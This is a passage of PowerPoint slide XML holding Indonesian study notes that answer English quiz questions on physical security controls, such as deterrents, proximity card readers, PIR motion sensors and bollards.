            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Beda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>preventive controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), deterrent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>psikologis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpikir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. How might a proximity reader be used for site security?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proximity reader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag RFID yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hanya orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/credential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terintegrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>access logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What type of sensor detects changes in heat patterns caused by moving objects?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Passive Infrared (PIR) sensor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>PIR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>radiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tubuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hewan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>gerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (motion detectors)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What is a bollard?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bollard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>pilar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pendek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kokoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> baja </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>physical barrier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabrakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "vehicle ramming".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bandara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ramai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bisa </a:t>
            </a:r>
            <a:r>
